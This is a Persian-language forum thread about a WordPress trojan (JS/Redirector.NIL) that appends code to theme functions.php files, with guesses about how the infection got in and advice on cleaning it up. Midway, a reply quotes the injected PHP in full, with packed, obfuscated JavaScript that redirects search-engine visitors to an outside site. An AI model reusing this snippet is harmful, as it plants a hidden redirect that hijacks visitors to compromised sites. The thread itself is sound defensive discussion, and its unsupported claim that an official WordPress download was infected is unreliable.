سلاماز دیروز JS/Redirector.NIL trojan وارد سایت های وردپرسم شده و nod32 هم سایت رو بلاک میکنه. این تروجان یک سری کد به ته فانکشن قالب اضافه میکنه . میشه برش داشت و دسترسی write رو از فانکشن گرفت ولی ، میخواستم بدونم این مربوط به باگ وردپرس میشه یا قالب ، یا از سیستم من وارد شده ؟

احتمالا از طریق باگ پلاگین های سایت شما وارد سورس هاتون شده

به سیستم شما مربوط نمیشه

اینها یکسری بات هستند که این کار رو انجام میدند

ببنید پلاگین چیزی اضافه کردید که بعد این اتفاق افتاده یا پلاگ آپدیت کردید؟

مساله عجیب اینجاست که من پلاگینی جدیدا نصب نکردم.

این مشکل کلافه کرده منو. چون 4 تا سایت وردپرس روی یک هاست دارم که اگه یکیشون با این مشکل مواجه بشه بقیه هم دچار میشن.

فقط روی ساب دامین سایتم یک اپلود سنتر نصب کردم که اونو وصل کردن به یه سرور دیگه که فایل هاش اونجا اپلود بشن.

از طریق ftp بوده.
سیستم هایی که از طریق ftp به سایت وصل میشوند را اسکن کنید.
پسورد هاست را تغییر دهید
به مدیر سرور نیز اطلاع دهید تا ویروس یابی کنند

از functions.php پاک کنید دوباره اضافه میشه

برای رفع این مشکل پیشنهاد میکنیم برنامه وردپرس را مجددا نصب و به دیتابیس قبلی متصل کنید. سپس تمامی افزونه های مطمئن را از پکیج سالم و اصلی آن نصب کرده و قالب برنامه را نیز مجددا نصب نمایید

دوستان من فقط میخوام بدونم این تروجان از سیستم من اومده یا نه. همین.

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=JavaScript>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(! ''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('e r=x.9,t=,q;4(r.3(m.)!=-1)t=q;4(r.3(7.)!=-1)t=q;4(r.3(8.)!=-1)t=p;4(r.3(a.)!=-1)t=q;4(r.3(f.)!=-1)t=g;4(r.3(j.)!=-1)t=q;4(t.6&&((q=r.3(?+t+=))!=-1||(q=r.3(&+t+=))!=-1))B.C=v+w+:/+/A+b+k+5+h.+c+z/s+u+5+h.p+d?+t+y=1&t+i+l=+r.n(q+2+t.6).o(&)[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|m s|google|substring|split||||||ea|ht|tp|document||| go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

احتمالا این کد هم هست ؟؟؟؟

بله همین کده .

این تروجان از سیستم فرد هم میتونه وارد بشه ؟

اینا چک کنید
ویروسی شدن وردپرس � انجمن وردپرس فارسی (http://forum.wp-persian.com/topic/19799)

اینجا هم در مورد این تروجان نوشته شده :
تروجان های p,a,c,k,e,d وردپرس و روش مقابله با آنها (http://www.ariyan.org/%D8%B3%DB%8C%D8%B3%D8%AA%D9%85-%D9%85%D8%AF%DB%8C%D8%B1%DB%8C%D8%AA-%D9%85%D8%AD%D8%AA%D9%88%D8%A7/%D9%88%D8%B1%D8%AF%D9%BE%D8%B1%D8%B3/%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-%D9%88%D8%B1%D8%AF%D9%BE%D8%B1%D8%B3-%D8%B3%DB%8C%D8%B3%D8%AA%D9%85-%D9%85%D8%AF%DB%8C%D8%B1%DB%8C%D8%AA-%D9%85%D8%AD%D8%AA%D9%88%D8%A7/%D8%AA%D8%B1%D9%88%D8%AC%D8%A7%D9%86-%D9%87%D8%A7%DB%8C-%D9%85%D8%AE%D8%B1%D8%A8-%D9%88%D8%B1%D8%AF%D9%BE%D8%B1%D8%B3-%D9%88-%D8%B1%D9%88%D8%B4-%D9%85%D9%82%D8%A7%D8%A8%D9%84%D9%87-%D8%A8%D8%A7-%D8%A2/)

احتمالا از اف تی پی و از داخل سیستم خودتون وارد هاست شده باشه

http://www.webhostingtalk.ir/f118/46146/

احتمالا از اف تی پی و از داخل سیستم خودتون وارد هاست شده باشه

توی آخرین نسخه که امروز از سایت وردپرس دانلود کردیم این کد بود : d
توی فایل revisions-js.php

عزیز دلم نه اشکال از وردپرس هست نه از افزونه های وردپرس
عیب شما اینه که از هر قالبی که توی نت می بینید استفاده می کنید
اول قالب را چک کنید
اون کد هم در فایل قالب جاسازی می کنند

شما میتونید به مدیر سرور گزارش کنید و بهشون بگید با استفاده از انتی ویروس سرور این تروجان را قرنطینه یا حذف کند
موفق باشید

سلام؛

مشکل از چند مورد می تونه باشه، مورد اول قالب هست، مورد دوم پلاگین هست، و مورد سوم استفاده از وردپرس ویروسی!
سعی کنید از وردپرس، قالب و افزونه هایی که در سایت های غیرمعتبر هست استفاده نکنید.

پیروز باشید.